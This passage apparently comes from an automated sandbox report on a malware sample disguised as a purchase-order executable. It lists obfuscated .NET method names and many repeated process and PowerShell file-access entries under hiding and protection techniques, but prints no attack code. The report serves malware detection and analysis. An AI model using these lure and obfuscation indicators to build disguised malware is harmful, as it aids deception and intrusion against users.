                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, H48JFYq2tdnsnGG75c.csHigh entropy of concatenated method names: 'uKt1IfjhdZ', 'tfJ1V8Md6R', 'cL21SbNCKe', 'VU91Oj37QJ', 'a1x12b1eOE', 'Wa01MJYIFE', 'Ipc1PkXPU0', 'NQu1vRfDwA', 'zoR15u42Pb', 'kUH1KdmSFq'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, uuVRExIJeZcn6YBP0r.csHigh entropy of concatenated method names: 'eE8gXOKDwQ', 'durg8mRLfi', 'oo3gYX5Gge', 'nLOgpSsvnZ', 'JFpgcA61di', 'fapgWvqgFW', 'vc8gyvMEse', 'GCmgRpqJdd', 'yATgiZo7rb', 'UFegjU9PUH'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, b2nk8xnoNtknNlXL4j.csHigh entropy of concatenated method names: 'Bx2oA5oKce', 'GZ3omGlXvj', 'CDoD0JH2HA', 'WNcD2uYIK6', 'VWWDMG2FIL', 'oZ8DLplkNk', 'smeDP7t9c6', 'LyXDvhow1w', 'zW8Du0EWTV', 'v8nD5GveZD'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, EAITTaDa7fhQTL9u84.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'w6JsiXCudU', 'vkhsjoVuck', 'LxlszaoAO8', 'FSgZeTEMCG', 'XDBZhZH1y4', 'kHBZsa0Dij', 'YXVZZri3tV', 'vpDdN9cVVk9tnC40KGt'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, p3ZODThZKAsx5ayVEbv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'h0SaXnvvWG', 'croa85yXTw', 'bYXaYNTPhb', 'T2iapYFRZk', 'xE2acOqXFb', 'm42aWXxSTv', 'CfRayeS1VR'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, hSbyLT792GkOJwvO67.csHigh entropy of concatenated method names: 'RYJhTuVREx', 'ueZhfcn6YB', 'i3ZhdrJYns', 'es8hxxs2nk', 'AXLhU4jGKQ', 'q3ghGnW8KS', 'ztBRY0dMOukhSVWrXZ', 'uZgXQgrRryfEWfnOYJ', 'Br0hhFHKR7', 'YI1hZFynme'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, aDNJxoV3ZrJYnsCs8x.csHigh entropy of concatenated method names: 'HNPDllJ11J', 's40DNnrMLa', 'YAwDIjGW6l', 'dgSDVDacoO', 'vwXDUYxxka', 'ksnDGwInxi', 'Qd5DttQtEr', 'N7qD6AhmOd', 'NbODFpfpGt', 'v4oDaCZfUh'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, iadXmCzC34PNtLgm7M.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lehF1r1v43', 'k9CFUqp7wM', 'j83FGuvgsN', 'aeVFt35HTE', 'kQqF6o2gKT', 'w19FFVWwjK', 'zAcFaF9wyU'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, tlRSVVuDgsKA0CXT0o.csHigh entropy of concatenated method names: 'dxfTQ7DVR3', 'QwpTbBtdY2', 'GKUT4sifiD', 'WDvTlElOQp', 'lpsTAG2Ow6', 'V1xTNaOpjj', 'VAHTmHAluf', 'TSMTIs0yTi', 'kLPTVnlfgN', 'MXPTnWucb4'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, qs6X13jo79liA4qpRG.csHigh entropy of concatenated method names: 'TftFhYiHEG', 'mmxFZVwBCZ', 'YGbF7fAKHn', 'um0FHDvTkD', 'DSSFgn3bsx', 'acTFo9HlMJ', 'GceFBk8IxU', 'Xdy6y9tLAp', 'w9p6Ret9uW', 'xt46iPSobr'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, QoIkhhYbTSMGuR8INc.csHigh entropy of concatenated method names: 'ToString', 'ghEGKc2iJL', 'QtbGOQB8Bn', 'XUiG0jXCZB', 'oIOG2DnyyS', 'oTjGMvRWqD', 'bVeGLjVVwW', 'bNdGPRPQ9q', 'IaBGvMHTOk', 'hU6GuNivU5'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, rHfq9Rhe45v49FJHf5F.csHigh entropy of concatenated method names: 'YNiFQ37Uj4', 'K2WFbDZRNH', 'bKWF4RPcOh', 'MGYFlIW9oE', 'aTTFADQ3BW', 'fY4FN4LLVI', 'h0fFmTXPr4', 'cHPFIDd1ky', 'WXiFV4mr7C', 'FeQFnWqX1d'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, l1j8iaRP3RQoLWVUbU.csHigh entropy of concatenated method names: 'dUf6HEmnfr', 'hia6g1yZPg', 'aMp6DbH2l2', 'qWp6oiDlYk', 'a5j6BlLGgV', 'FGN6TCshJh', 'm7U6fACakK', 'FxZ6ra9LYg', 'fFA6d0quOF', 'IcN6x8FQxc'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, pKQ63gSnW8KStsUOvB.csHigh entropy of concatenated method names: 'l22BCR00Ri', 'PSdBgTUO8J', 'VlmBoeaKOg', 'JJcBTp86Dt', 'kcuBfllAqS', 'VDeocupURc', 'D4HoWhtcxi', 'DCZoy7C5DY', 'OVKoRoYMIt', 'rv5oi7WHTq'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, suXuY2gFs2qKcgS69B.csHigh entropy of concatenated method names: 'Dispose', 'b6xhig8v4d', 'KNqsOI5GaJ', 'CXGllrJcW1', 'Bd1hjj8iaP', 'PRQhzoLWVU', 'ProcessDialogKey', 'yUZseSTvmA', 'LhashfFqgq', 'Iwass6s6X1'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, cSTvmAiPhafFqgq0wa.csHigh entropy of concatenated method names: 'MFC6S6ZRM7', 'pdS6OabSjA', 'S4560WheQm', 'J9j62P12C4', 'p1e6Xhx522', 'wNo6MsmbG3', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, b9bGJTX07refrtngyX.csHigh entropy of concatenated method names: 'KvsU5iP3Tj', 'aXvU36eZB5', 'MnHUXVKQML', 'j9MU8XUGyC', 'U3sUOjDgJS', 'cxHU0nq8ke', 'wk0U2i2pMa', 'vDVUMadG7b', 'zl6ULtB7J6', 'sHNUPnrkNv'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, WqcMW7fGuvAyFrWZNB.csHigh entropy of concatenated method names: 'zGeZCMVSQ3', 'H1AZHxSSwi', 'ufVZgZ4SlZ', 'vWlZDckeGE', 'IqkZomCyAJ', 'wDLZBGHYsp', 'Kr7ZTMQior', 'ym2Zfpc94j', 'YyLZriHeeU', 'zctZdmJiim'

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
